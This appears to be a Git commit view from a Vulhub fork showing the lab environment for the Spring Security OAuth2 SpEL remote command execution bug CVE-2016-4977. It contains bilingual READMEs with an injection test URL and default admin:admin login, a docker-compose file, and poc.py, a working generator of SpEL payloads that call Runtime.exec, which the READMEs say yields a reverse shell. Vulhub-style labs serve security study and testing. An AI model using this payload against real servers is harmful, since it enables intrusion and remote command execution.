aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
spring/CVE-2016-4977/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 17 KiB

BIN
spring/CVE-2016-4977/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 65 KiB

BIN
spring/CVE-2016-4977/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 16 KiB

39
spring/CVE-2016-4977/README.md Normal file
View File

@@ -0,0 +1,39 @@
# Spring Security OAuth2 Remote Command Execution Vulnerability (CVE-2016-4977)
[中文版本(Chinese version)](README.zh-cn.md)
Spring Security OAuth provides support for using Spring Security with OAuth (1a) and OAuth2 using standard Spring and Spring Security programming models and configuration idioms.
In its use of whitelabel views for error handling, an remote attacker can execute commands by constructing malicious parameters through the Springs Expression Language (SpEL).
Reference links.
- http://secalert.net/#CVE-2016-4977
- https://deadpool.sh/2017/RCE-Springs/
- http://blog.knownsec.com/2016/10/spring-security-oauth-rce/
## Vulnerability environment
Execute the following command to start a Spring Security OAuth application.
```
docker compose up -d
```
After the server is started, browse the ``http://your-ip:8080/`` to see its home page.
## Exploit
Request to the `http://your-ip:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test`, first you need to fill in the username and password, we just fill in `admin:admin` here.
As you can see, SpEL expression `${233*233}` has been successfully executed and returned the result.
![](1.png)
We then use [poc.py](poc.py) to generate an EXP for the [reverse shell](http://www.jackson-t.ca/runtime-exec-payloads.html):
![](2.png)
As above, a long SpEL expression exploit is generated. Send the request with this SpEL exploit, a reverse shell is gained:
![](3.png)

35
spring/CVE-2016-4977/README.zh-cn.md Normal file
View File

@@ -0,0 +1,35 @@
# Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977
Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。
参考链接:
- http://secalert.net/#CVE-2016-4977
- https://deadpool.sh/2017/RCE-Springs/
- http://blog.knownsec.com/2016/10/spring-security-oauth-rce/
## 运行环境
执行如下命令启动漏洞环境:
```
docker compose up -d
```
启动完成后,访问`http://your-ip:8080/`即可看到web页面。
## 漏洞复现
访问`http://your-ip:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test`。首先需要填写用户名和密码,我们这里填入`admin:admin`即可。
可见我们输入是SpEL表达式`${233*233}`已经成功执行并返回结果:
![](1.png)
然后,我们使用[poc.py](poc.py)来生成反弹shell的POC注意[Java反弹shell的限制与绕过方式](http://www.jackson-t.ca/runtime-exec-payloads.html)
![](2.png)
如上图生成了一大串SpEL语句。附带上这个SpEL语句访问成功弹回shell
![](3.png)

6
spring/CVE-2016-4977/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
version: '2'
services:
spring:
image: vulhub/spring-security-oauth2:2.0.8
ports:
- "8080:8080"

12
spring/CVE-2016-4977/poc.py Normal file
View File

@@ -0,0 +1,12 @@
#!/usr/bin/env python
message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
print(poc)